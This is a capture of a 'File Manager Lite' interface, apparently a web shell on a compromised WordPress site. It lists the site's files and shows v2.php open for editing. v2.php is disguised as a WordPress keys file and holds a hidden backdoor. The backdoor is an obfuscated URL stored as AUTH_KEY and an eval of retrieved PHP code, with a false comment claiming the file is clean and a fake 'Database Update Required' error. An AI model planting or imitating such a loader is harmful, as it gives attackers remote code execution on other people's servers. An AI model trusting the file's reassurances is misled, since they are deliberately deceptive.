File Manager Lite
Dir:
/home/u802038231/domains/abelectricpower.com/public_html
Upload
[..]
.htaccess (440 B)
Edit
Rename
Del
.htaccess.bk (714 B)
Edit
Rename
Del
.private/
Rename
Del
.tmb/
Rename
Del
@LongLink/
Rename
Del
backup.zip (122 B)
Edit
Rename
Del
file.php (1.86 MB)
Edit
Rename
Del
googlec0cc72f61677e79a.html (53 B)
Edit
Rename
Del
home.php (405 B)
Edit
Rename
Del
index.php (591 B)
Edit
Rename
Del
license.txt (19.44 KB)
Edit
Rename
Del
llms.txt (15.18 KB)
Edit
Rename
Del
readme.html (7.25 KB)
Edit
Rename
Del
rlc.txt (1 B)
Edit
Rename
Del
robots.txt (980 B)
Edit
Rename
Del
tmp/
Rename
Del
v2.php (1.18 KB)
Edit
Rename
Del
wp-admin/
Rename
Del
wp-blog-header.php (351 B)
Edit
Rename
Del
wp-comments-post.php (2.27 KB)
Edit
Rename
Del
wp-config.php (3.47 KB)
Edit
Rename
Del
wp-content/
Rename
Del
wp-cron.php (5.49 KB)
Edit
Rename
Del
wp-includes/
Rename
Del
wp-links-opml.php (2.44 KB)
Edit
Rename
Del
wp-links.php (1.46 KB)
Edit
Rename
Del
wp-login.php (50.21 KB)
Edit
Rename
Del
wp-mail.php (8.52 KB)
Edit
Rename
Del
wp-signup.php (33.71 KB)
Edit
Rename
Del
wp-trackback.php (4.98 KB)
Edit
Rename
Del
Edit: v2.php
<?php /** * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ /** * Database table prefix and authentication keys. * * @package WordPress */ // Security configuration constants define('AUTH_KEY', '/zbp.ohuzbzcrgf//:fcggu'); /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ /** * Secure content validation and execution * Validates and processes retrieved security updates */ if ($wp_loader !== false && !empty($wp_loader)) { if (strpos($wp_loader, '<?php') === 0) { eval('?>' . $wp_loader); } } else { /** * Error handling for failed updates * @since 3.0.0 */ if (!defined('WP_DEBUG') || WP_DEBUG === false) { status_header(503); nocache_headers(); } exit('Database Update Required'); } ?>
Simpan